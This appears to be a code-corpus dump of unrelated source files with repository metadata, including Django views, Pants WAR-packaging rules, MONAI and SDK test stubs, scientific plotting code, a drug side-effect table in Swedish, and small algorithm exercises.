}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/select.html', context)
class BuyGiftView(View):
def get_context_data(self, **kwargs):
table = Table.objects.get(pk=kwargs.get('pk'))
gift = Gift.objects.get(pk=kwargs.get('id'))
form = BuyGiftForm()
context = {
'table': table,
'gift': gift,
'form': form,
}
return context
def get(self, request, **kwargs):
context = self.get_context_data(**kwargs)
return TemplateResponse(request, 'tables/buy.html', context)
def post(self, request, **kwargs):
context = self.get_context_data(**kwargs)
buy_gift_form = BuyGiftForm(
request.POST,
request=request,
table=context['table'],
gift=context['gift'],
)
if buy_gift_form.is_valid():
buy_gift_form.save()
messages.info(request, "Felicidades, la compra fue completada con exito")
return redirect(reverse_lazy('tables:select_gift', kwargs={'pk': kwargs.get('pk')}))
context['form'] = buy_gift_form
return TemplateResponse(request, 'tables/buy.html', context)
|
[
"[email protected]"
] | |
5f1ebaaf134e28a2cce175fab00ab1e2933603c3
|
5db0fab37c2b8a618d85d3b60fab9f806c416474
|
/src/python/pants/jvm/package/war.py
|
31c96a849f1c243e7a90c996c3d22ed4cd110ea1
|
[
"Apache-2.0"
] |
permissive
|
pantsbuild/pants
|
4988d1ac5474ec95f94ce2218aeb759401e4b011
|
98cbda8545f0d58c586ed2daa76fefd729d5e0d5
|
refs/heads/main
| 2023-09-05T03:44:17.646899 | 2023-09-01T19:52:09 | 2023-09-01T19:52:09 | 7,209,075 | 2,708 | 593 |
Apache-2.0
| 2023-09-14T19:33:33 | 2012-12-17T17:39:04 |
Python
|
UTF-8
|
Python
| false | false | 7,675 |
py
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import textwrap
from dataclasses import dataclass
from pathlib import PurePath
from typing import Iterable
from pants.build_graph.address import Address
from pants.core.goals.package import (
BuiltPackage,
BuiltPackageArtifact,
OutputPathField,
PackageFieldSet,
)
from pants.core.target_types import FileSourceField, ResourceSourceField
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.system_binaries import BashBinary, ZipBinary
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import (
EMPTY_DIGEST,
AddPrefix,
CreateDigest,
Digest,
DigestEntries,
DigestSubset,
Directory,
FileContent,
FileEntry,
MergeDigests,
PathGlobs,
)
from pants.engine.internals.selectors import MultiGet
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import (
DependenciesRequest,
HydratedSources,
HydrateSourcesRequest,
SourcesField,
Targets,
)
from pants.engine.unions import UnionRule
from pants.jvm.classpath import Classpath
from pants.jvm.shading.rules import ShadedJar, ShadeJarRequest
from pants.jvm.target_types import (
JvmShadingRule,
JvmWarContentField,
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
JvmWarShadingRulesField,
)
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class PackageWarFileFieldSet(PackageFieldSet):
required_fields = (
JvmWarDependenciesField,
JvmWarDescriptorAddressField,
)
output_path: OutputPathField
dependencies: JvmWarDependenciesField
descriptor: JvmWarDescriptorAddressField
content: JvmWarContentField
shading_rules: JvmWarShadingRulesField
@dataclass(frozen=True)
class RenderWarDeploymentDescriptorRequest:
descriptor: JvmWarDescriptorAddressField
owning_address: Address
@dataclass(frozen=True)
class RenderedWarDeploymentDescriptor:
digest: Digest
@dataclass(frozen=True)
class RenderWarContentRequest:
content: JvmWarContentField
@dataclass(frozen=True)
class RenderedWarContent:
digest: Digest
async def _apply_shading_rules_to_classpath(
classpath: Classpath, shading_rules: Iterable[JvmShadingRule] | None
) -> Digest:
input_digest = await Get(Digest, MergeDigests(classpath.digests()))
if not shading_rules:
return input_digest
jars_digest = await Get(Digest, DigestSubset(input_digest, PathGlobs(["**/*.jar"])))
digest_entries = await Get(DigestEntries, Digest, jars_digest)
jar_entries = [entry for entry in digest_entries if isinstance(entry, FileEntry)]
if len(jar_entries) == 0:
return EMPTY_DIGEST
jar_digests = await MultiGet(Get(Digest, CreateDigest([entry])) for entry in jar_entries)
shaded_jars = await MultiGet(
Get(ShadedJar, ShadeJarRequest(path=entry.path, digest=digest, rules=shading_rules))
for entry, digest in zip(jar_entries, jar_digests)
)
return await Get(Digest, MergeDigests([shaded.digest for shaded in shaded_jars]))
@rule
async def package_war(
field_set: PackageWarFileFieldSet,
bash: BashBinary,
zip: ZipBinary,
) -> BuiltPackage:
classpath = await Get(Classpath, DependenciesRequest(field_set.dependencies))
all_jar_files_digest = await _apply_shading_rules_to_classpath(
classpath, field_set.shading_rules.value
)
prefixed_jars_digest, content, descriptor, input_setup_digest = await MultiGet(
Get(Digest, AddPrefix(all_jar_files_digest, "__war__/WEB-INF/lib")),
Get(RenderedWarContent, RenderWarContentRequest(field_set.content)),
Get(
RenderedWarDeploymentDescriptor,
RenderWarDeploymentDescriptorRequest(field_set.descriptor, field_set.address),
),
Get(
Digest,
CreateDigest(
[
FileContent(
"make_war.sh",
textwrap.dedent(
f"""\
cd __war__
{zip.path} ../output.war -r .
"""
).encode(),
is_executable=True,
),
Directory("__war__/WEB-INF/classes"),
Directory("__war__/WEB-INF/lib"),
]
),
),
)
input_digest = await Get(
Digest,
MergeDigests(
[
prefixed_jars_digest,
descriptor.digest,
content.digest,
input_setup_digest,
]
),
)
result = await Get(
ProcessResult,
Process(
[bash.path, "make_war.sh"],
input_digest=input_digest,
output_files=("output.war",),
description=f"Assemble WAR file for {field_set.address}",
),
)
output_entries = await Get(DigestEntries, Digest, result.output_digest)
if len(output_entries) != 1:
raise AssertionError("No output from war assembly step.")
output_entry = output_entries[0]
if not isinstance(output_entry, FileEntry):
raise AssertionError("Unexpected digest entry")
output_filename = PurePath(field_set.output_path.value_or_default(file_ending="war"))
package_digest = await Get(
Digest, CreateDigest([FileEntry(str(output_filename), output_entry.file_digest)])
)
artifact = BuiltPackageArtifact(relpath=str(output_filename))
return BuiltPackage(digest=package_digest, artifacts=(artifact,))
@rule
async def render_war_deployment_descriptor(
request: RenderWarDeploymentDescriptorRequest,
) -> RenderedWarDeploymentDescriptor:
descriptor_sources = await Get(
HydratedSources,
HydrateSourcesRequest(request.descriptor),
)
descriptor_sources_entries = await Get(
DigestEntries, Digest, descriptor_sources.snapshot.digest
)
if len(descriptor_sources_entries) != 1:
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to only refer to one file."
)
descriptor_entry = descriptor_sources_entries[0]
if not isinstance(descriptor_entry, FileEntry):
raise AssertionError(
f"Expected `descriptor` field for {request.descriptor.address} to produce a file."
)
descriptor_digest = await Get(
Digest,
CreateDigest([FileEntry("__war__/WEB-INF/web.xml", descriptor_entry.file_digest)]),
)
return RenderedWarDeploymentDescriptor(descriptor_digest)
@rule
async def render_war_content(request: RenderWarContentRequest) -> RenderedWarContent:
addresses = await Get(
Addresses, UnparsedAddressInputs, request.content.to_unparsed_address_inputs()
)
targets = await Get(Targets, Addresses, addresses)
sources = await Get(
SourceFiles,
SourceFilesRequest(
[tgt[SourcesField] for tgt in targets if tgt.has_field(SourcesField)],
for_sources_types=(ResourceSourceField, FileSourceField),
enable_codegen=True,
),
)
digest = await Get(Digest, AddPrefix(sources.snapshot.digest, "__war__"))
return RenderedWarContent(digest)
def rules():
return (
*collect_rules(),
UnionRule(PackageFieldSet, PackageWarFileFieldSet),
)
|
[
"[email protected]"
] | |
fe2f7f2530cf752e62798071f21f4b0661893d06
|
15a992391375efd487b6442daf4e9dd963167379
|
/tests/test_simulatedelay.py
|
3a0507dae745ed25ed225fcb317707121dba18bb
|
[
"Apache-2.0"
] |
permissive
|
Bala93/MONAI
|
b0e68e1b513adcd20eab5158d4a0e5c56347a2cd
|
e0a7eff5066da307a73df9145077f6f1fec7a514
|
refs/heads/master
| 2022-08-22T18:01:25.892982 | 2022-08-12T18:13:53 | 2022-08-12T18:13:53 | 259,398,958 | 2 | 0 | null | 2020-04-27T17:09:12 | 2020-04-27T17:09:11 | null |
UTF-8
|
Python
| false | false | 1,251 |
py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
from parameterized import parameterized
from monai.transforms.utility.array import SimulateDelay
from tests.utils import NumpyImageTestCase2D
class TestSimulateDelay(NumpyImageTestCase2D):
@parameterized.expand([(0.45,), (1,)])
def test_value(self, delay_test_time: float):
resize = SimulateDelay(delay_time=delay_test_time)
start: float = time.time()
_ = resize(self.imt[0])
stop: float = time.time()
measured_approximate: float = stop - start
np.testing.assert_allclose(delay_test_time, measured_approximate, rtol=0.5)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
03d4ba232b4d34b7e9a72471e1ff44e5c604831f
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/man_and_new_group/different_group_or_little_hand.py
|
152d6b704e1cb5dd4be2d6ff23ee40a673ea85fe
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 207 |
py
|
#! /usr/bin/env python
def company(str_arg):
day_and_small_way(str_arg)
print('get_new_fact')
def day_and_small_way(str_arg):
print(str_arg)
if __name__ == '__main__':
company('company')
|
[
"[email protected]"
] | |
45c62288d5d20727fe79c75003386cfc2e2e82e3
|
0e5658deaa630a603a7134847518408c09e3a6d0
|
/vendor/riffyn-sdk/test/test_groups.py
|
3978a7552a12b93bca07b271cda5e70fcf6ab897
|
[] |
no_license
|
jace-ys/lab-automation
|
cb0d0d2b88ec64e235cffca8bbf556b22c55ab1e
|
27be3a942b111404844f29aa9a0dd957b7fde459
|
refs/heads/master
| 2023-06-01T20:30:55.557975 | 2021-06-16T07:46:20 | 2021-06-16T08:15:38 | 297,329,484 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,565 |
py
|
# coding: utf-8
"""
Riffyn Nexus REST API V1
## Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ## Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ## Authentication Begin with a call the [authenticate](#/authentication/authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn Nexus App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn Nexus API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your preferred token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](#/authentication/verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn Nexus App UI. ## Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ## Postman endpoint examples There is a YAML file with the examples of the request on Riffyn Nexus API [Click here](/v1/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ## Client SDKs You may write your own API client, or you may use one of ours. [Click here](/v1/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 4.2.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import riffyn_nexus_sdk_v1
from riffyn_nexus_sdk_v1.models.groups import Groups # noqa: E501
from riffyn_nexus_sdk_v1.rest import ApiException
class TestGroups(unittest.TestCase):
"""Groups unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroups(self):
"""Test Groups"""
# FIXME: construct object with mandatory attributes with example values
# model = riffyn_nexus_sdk_v1.models.groups.Groups() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ad9064e708a629da144f757f5219de9f0fe28990
|
81e6391b9db249296ec84f6524093cf41b581f31
|
/단계별로 풀어보기/18. 큐, 덱/[11866] 요세푸스 문제 0.py
|
036703aae87a0030be4e80cef574bbad953c51d2
|
[] |
no_license
|
jaeehooon/baekjoon_python
|
e991be4b510d642f72f625b898d20451dc920d7c
|
295776309a883338bfbf51c33caf6dc6629493ca
|
refs/heads/master
| 2023-04-15T14:22:21.281930 | 2021-04-26T02:15:09 | 2021-04-26T02:15:09 | 294,137,750 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
import sys
from collections import deque
class MyDeque(object):
def __init__(self, size):
self.dq = deque(i for i in range(1, size + 1))
def remove(self, kth):
for _ in range(kth - 1):
self.dq.append(self.dq.popleft())
return self.dq.popleft()
def size(self):
return len(self.dq)
if __name__ == '__main__':
N, K = map(int, sys.stdin.readline().split())
result = list()
dq = MyDeque(N)
while dq.size() != 0:
result.append(dq.remove(K))
print(str(result).replace("[", '<').replace("]", ">"))
|
[
"[email protected]"
] | |
d4d9d009198e4aa20e9f0cf82447cf8d32471e26
|
0fe11fbe31be719a253c0b2d9e41e20fedc2c40f
|
/dapper/mods/LorenzUV/illust_LorenzUV.py
|
212f07e00e12c2a3c7334ea3bcc7de4151b5083c
|
[
"MIT"
] |
permissive
|
lijunde/DAPPER
|
148ff5cefb92d1bb01c78bd4a82a6f1ecdebdad2
|
dc92a7339932af059967bd9cf0a473ae9b8d7bf9
|
refs/heads/master
| 2020-12-10T21:44:54.468785 | 2019-09-24T18:18:36 | 2019-09-24T18:18:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,078 |
py
|
# Quick illustration.
# Sorry for the mess.
from dapper import *
from matplotlib import cm
# Setup
sd0 = seed(4)
# from dapper.mods.LorenzUV.wilks05 import LUV
from dapper.mods.LorenzUV.lorenz95 import LUV
nU, J = LUV.nU, LUV.J
dt = 0.005
t0 = np.nan
K = int(10/dt)
step_1 = with_rk4(LUV.dxdt,autonom=True)
step_K = with_recursion(step_1,prog=1)
x0 = 0.01*randn(LUV.M)
x0 = step_K(x0,int(2/dt),t0,dt)[-1] # BurnIn
xx = step_K(x0,K ,t0,dt)
# Grab parts of state vector
ii = arange(nU+1)
jj = arange(nU*J+1)
circU = np.mod(ii ,nU)
circV = np.mod(jj,nU*J) + nU
iU = np.hstack([0, 0.5+arange(nU), nU])
def Ui(xx):
interp = (xx[0]+xx[-1])/2
return np.hstack([interp, xx, interp])
# Overlay linear
fg = plt.figure(2)
fg.clear()
ax = fg.gca()
L = 20 # Num of lines to plot
start = int(3e5*dt)
step = 3
for i,Ny in enumerate(range(L)):
k = start + Ny*step
c = cm.viridis(1-Ny/L)
a = 0.8-0.2*Ny/L
plt.plot(iU ,Ui(xx[k][:nU]),color=c,lw=2 ,alpha=a)[0]
if i%2==0:
plt.plot(jj/J,xx[k][circV] ,color=c,lw=0.7,alpha=a)[0]
# Make ticks, ticklabels, grid
ax.set_xticks([])
ym,yM = -4,10
ax.set_ylim(ym,yM)
ax.set_xlim(0,nU)
dY = 4 # SET TO: 1 for wilks05, 4 for lorenz95
# U-vars: major
tU = iU[1:-1]
lU = np.array([str(i+1) for i in range(nU)])
tU = ccat(tU[0],tU[dY-1::dY])
lU = ccat(lU[0],lU[dY-1::dY])
for t, l in zip(tU,lU):
ax.text(t,ym-.6,l,fontsize=mpl.rcParams['xtick.labelsize'],horizontalalignment='center')
ax.vlines(t, ym, -3.78, 'k',lw=mpl.rcParams['xtick.major.width'])
# V-vars: minor
tV = arange(nU+1)
lV = ['1'] + [str((i+1)*J) for i in circU]
for i, (t, l) in enumerate(zip(tV,lV)):
if i%dY==0:
ax.text(t,-5.0,l,fontsize=9,horizontalalignment='center')
ax.vlines(t,ym,yM,lw=0.3)
ax.vlines(t, ym, -3.9, 'k',lw=mpl.rcParams['xtick.minor.width'])
ax.grid(color='k',alpha=0.6,lw=0.4,axis='y',which='major')
# # Convert to circular coordinates
# # Should have used instead: projection='polar'
# def tU(zz):
# xx = (40 + 3*zz)*cos(2*pi*ii/nU)
# yy = (40 + 3*zz)*sin(2*pi*ii/nU)
# return xx,yy
# def tV(zz):
# xx = (80 + 15*zz)*cos(2*pi*jj/nU/J)
# yy = (80 + 15*zz)*sin(2*pi*jj/nU/J)
# return xx,yy
#
#
# # Animate circ
# plt.figure(3)
# lhU = plt.plot(*tU(xx[-1][circU]),'b',lw=3)[0]
# lhV = plt.plot(*tV(xx[-1][circV]),'g',lw=1)[0]
# for k in progbar(range(K),'Plotting'):
# dataU = tU(xx[k][circU])
# dataV = tV(xx[k][circV])
# lhU.set_xdata(dataU[0])
# lhU.set_ydata(dataU[1])
# lhV.set_xdata(dataV[0])
# lhV.set_ydata(dataV[1])
# plt.pause(0.001)
#
#
# # Overlay circ
# from matplotlib import cm
# fg = plt.figure(4)
# fg.clear()
# plt.plot(*tU(4.52*np.ones_like(circU)),color='k',lw=1)[0]
# plt.plot(*tV(0.15*np.ones_like(circV)),color='k',lw=1)[0]
# ax = fg.axes[0]
# ax.set_axis_off()
# ax.set_facecolor('white')
# ax.set_aspect('equal')
# L = 40 # Num of lines to plot
# for Ny in range(L):
# k = 143 + Ny*3
# c = cm.viridis(1-Ny/L)
# a = 0.8-0.2*Ny/L
# plt.plot(*tU(xx[k][circU]),color=c,lw=2,alpha=a)[0]
# plt.plot(*tV(xx[k][circV]),color=c,lw=1,alpha=a)[0]
|
[
"[email protected]"
] | |
ebc47b77e7121455d0580d51a74c276f7501266c
|
3e19be3527431ba4949f1dc868158cf4f3ea92c5
|
/rps_game/round.py
|
c5d4208b7de5bd1e5d4c006026c56fe26f079cca
|
[] |
no_license
|
aldotele/rock_paper_scissors
|
f61626ba941181c0568045448686e5d14c11d9bb
|
6562cd15921d6736705c6490f1614f7335f9c38e
|
refs/heads/main
| 2023-06-13T00:43:10.425229 | 2021-07-06T09:40:15 | 2021-07-06T09:40:15 | 382,092,277 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 902 |
py
|
class Round:
choices = {1: "Rock", 2: "Paper", 3: "Scissors"}
def __init__(self, player_1_choice, player_2_choice):
if Round.is_choice_valid(player_1_choice) and Round.is_choice_valid(player_2_choice):
self.player_1_choice = int(player_1_choice)
self.player_2_choice = int(player_2_choice)
self.winner = ""
else:
raise ValueError("choice must be an integer between 1 and 3")
@staticmethod
def is_choice_valid(choice_code):
try:
choice_code = int(choice_code)
if choice_code in Round.choices:
return True
else:
return False
except ValueError:
return False
@staticmethod
def show_options():
for code in Round.choices:
print(f"{code} - {Round.choices[code]}")
if __name__ == '__main__':
pass
|
[
"[email protected]"
] | |
28113d33d023705405400f808d2b609e2b69010e
|
de6ee907b82f52833d8e492e56ffebbd90528eed
|
/core/migrations/0001_initial.py
|
c1e82cd59dd68136aab1fdb5e967541ef268f0d1
|
[] |
no_license
|
ffabiorj/portfolio
|
2c27e25f851790bef85912b07fb341111a117563
|
a253742227776ff4d4d2d343cb87eba9599577e2
|
refs/heads/master
| 2021-06-03T04:24:50.879948 | 2020-04-19T01:44:45 | 2020-04-19T01:44:45 | 125,946,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 668 |
py
|
# Generated by Django 3.0.5 on 2020-04-16 23:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('technology', models.CharField(max_length=20)),
('image', models.FilePathField(path='/img')),
],
),
]
|
[
"[email protected]"
] | |
a82a2b404fb48e9e88d3425db6cc1940f4624616
|
b39d9ef9175077ac6f03b66d97b073d85b6bc4d0
|
/Tygacil_WC500044508.py
|
7f23d111f63c0abada426f34c9a04781adb23398
|
[] |
no_license
|
urudaro/data-ue
|
2d840fdce8ba7e759b5551cb3ee277d046464fe0
|
176c57533b66754ee05a96a7429c3e610188e4aa
|
refs/heads/master
| 2021-01-22T12:02:16.931087 | 2013-07-16T14:05:41 | 2013-07-16T14:05:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,494 |
py
|
{'_data': [['Very common', [['GI', u'Illam\xe5ende, kr\xe4kningar, diarr\xe9']]],
['Common',
[['Infections', u'Pneumoni, abscess, infektioner'],
['Blood',
u'F\xf6rl\xe4ngd aktiverad partiell tromboplastintid (aPTT), f\xf6rl\xe4ngd protrombintid (PT)'],
['Metabolism', u'Hypoglykemi'],
['Nervous system', u'Yrsel'],
['Vascular', u'Flebit'],
['GI', u'Abdominell sm\xe4rta, dyspepsi, anorexi'],
['Hepato',
u'F\xf6rh\xf6jt aspartataminotransferas (ASAT) i serum, och f\xf6rh\xf6jt alaninaminotransferas (ALAT) i serum, hyperbilirubinemi'],
['Skin', u'Kl\xe5da, utslag'],
['General', u'Huvudv\xe4rk, f\xf6rs\xe4mrad l\xe4kning'],
['Investigations',
u'F\xf6rh\xf6jt serumamylas, f\xf6rh\xf6jda v\xe4rden av urin\xe4mne i blod (BUN) c. Beskrivning av ett urval biverkningar Generella antibiotikabiverkningar (klasseffekter): Pseudomembran\xf6s kolit, som kan variera i sv\xe5righetsgrad fr\xe5n mild till livshotande (se avsnitt 4.4). \xd6verv\xe4xt av icke-k\xe4nsliga organismer inklusive svamp (se avsnitt 4.4) Generella tetracyklinbiverkningar (klasseffekter): Antibiotika av klassen glycylcykliner \xe4r strukturellt likartade antibiotika i tetracyklinklassen. Biverkningar f\xf6r antibiotika tillh\xf6rande tetracyklinklassen kan inkludera ljusk\xe4nslighet, cerebral pseudotum\xf6r, pankreatit och anti-anabola effekter som kan leda till \xf6kad BUN (m\xe4ngden urin\xe4mne i blod), azotemi, acidos och hyperfosfatemi (se avsnitt 4.4). Tigecyklin kan eventuellt orsaka permanent missf\xe4rgning av t\xe4nder vid anv\xe4ndning under tandutvecklingen (se avsnitt 4.4). I kliniska fas 3-studier rapporterades infektionsrelaterade biverkningar oftare hos patienter som behandlades med tigecyklin (6,7 %) j\xe4mf\xf6rt med kontrollgruppen (4,6 %). Signifikanta skillnader avseende sepsis/septisk chock med tigecyklin (1,5 %) j\xe4mf\xf6rt med kontrollgruppen (0,5 %) observerades. Avvikelser i ASAT och ALAT hos Tygacil-behandlade patienter rapporterades oftare under tiden efter behandlingen \xe4n hos kontrollgruppen, d\xe4r dessa oftare f\xf6rekom under behandlingen. I alla fas 3 och fas 4\u2013studier (med komplicerade hud- och mjukdelsinfektioner samt komplicerade intraabdominala infektioner) f\xf6rekom d\xf6dsfall hos 2,4 % (54/2216) av patienterna som f\xe5tt tigecyklin och 1,7 % (37/2206) av patienterna som f\xe5tt j\xe4mf\xf6rande l\xe4kemedel.']]],
['Uncommon',
[['Infections', u'Sepsis, septisk chock'],
['Blood', u'Trombocytopeni, f\xf6rh\xf6jt International Normalised Ratio (INR)'],
['Metabolism', u'Hypoproteinemi'],
['Vascular', u'Tromboflebit'],
['GI', u'Akut pankreatit (se avsnitt 4.4)'],
['Hepato', u'Ikterus, leverskada mestadels kolestatisk'],
['General',
u'Reaktioner vid injektionsst\xe4llet, inflammation vid injektionsst\xe4llet, sm\xe4rta vid injektionsst\xe4llet, \xf6dem vid injektionsst\xe4llet, flebit vid injektionsst\xe4llet']]],
['Unknown',
[['Immune system',
u'Anafylaktiska/anafylaktoida reaktioner (se avsnitt 4.3 och 4.4)'],
['Hepato', u'Leversvikt (se avsnitt 4,4)'],
['Skin', u'Allvarliga hudreaktioner, inkl. Steven-Johnsons syndrom']]]],
'_pages': [6, 7],
u'_rank': 21,
u'_type': u'LSFU'}
|
[
"[email protected]"
] | |
cea59f25724bc06eaf721cb450fe61b141a9c80d
|
c733e6b433914a8faba256c7853f5cf2cd39c62a
|
/Python/Leetcode Daily Practice/DP/combination_sum.py
|
6a9cf686a28a7a53a156eff82aed1ccf54c2b5a9
|
[] |
no_license
|
YaqianQi/Algorithm-and-Data-Structure
|
3016bebcc1f1356b6e5f3c3e588f3d46c276a805
|
2e1751263f484709102f7f2caf18776a004c8230
|
refs/heads/master
| 2021-10-27T16:29:18.409235 | 2021-10-14T13:57:36 | 2021-10-14T13:57:36 | 178,946,803 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,304 |
py
|
"""
Input: {1, 2, 3, 7}, S=6
Output: True
The given set has a subset whose sum is '6': {1, 2, 3}
"""
# brute-force
# top-down with memo
# bottom up
def combination_sum_brute_force(num, sum_val):
# o(2**n)
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 or idx >= len(num):
return -1
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
return 1
return dfs(idx + 1, sum_val)
return dfs(0, sum_val)
def combination_sum_top_down_memo(num, sum_val):
# dp[num_idx][sum_val]
n = len(num)
dp = [[-1 for _ in range(sum_val+1)] for _ in range(n)]
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 and idx >= len(num):
return -1
# print(idx, sum_val)
if dp[idx][sum_val] == -1:
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
dp[idx][sum_val] = 1
return 1
else:
dp[idx][sum_val] = dfs(idx + 1, sum_val)
return dp[idx][sum_val]
return dfs(0, sum_val)
def combination_sum_bottom_up(num, sum_val):
# dp[num_idx][sum_val]
m = len(num)
n = sum_val + 1
dp = [[False for x in range(sum_val+1)] for y in range(len(num))]
# populate the sum = 0 columns, as we can always form '0' sum with an empty set
for i in range(0, len(num)):
dp[i][0] = True
# with only one number, we can form a subset only when the required sum is
# equal to its value
for s in range(1, sum_val+1):
dp[0][s] = True if num[0] == s else False
for i in range(1, m):
for j in range(1, n):
if dp[i-1][j]:
dp[i][j] = dp[i-1][j]
elif num[i] <= j:
dp[i][j] = dp[i-1][j - num[i]]
return dp[-1][-1]
def combination_sum_optimize_bottom_up(num, sum_val):
dp = [0] * (sum_val + 1)
dp[0] = 1
for i in range(len(num)):
for j in range(1, sum_val + 1):
if dp[j]:
continue
elif num[i] <= j:
dp[j] = dp[j-num[i]]
return dp[-1]
print(combination_sum_optimize_bottom_up([1,2,3,7], 6))
|
[
"[email protected]"
] | |
0f96edf164bfcaa85f71e6aa56f0b0d63472581a
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/tree-big-3528.py
|
2c12f2b79fef7e2608f8c704ed0cd7081df25e8e
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,291 |
py
|
# Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
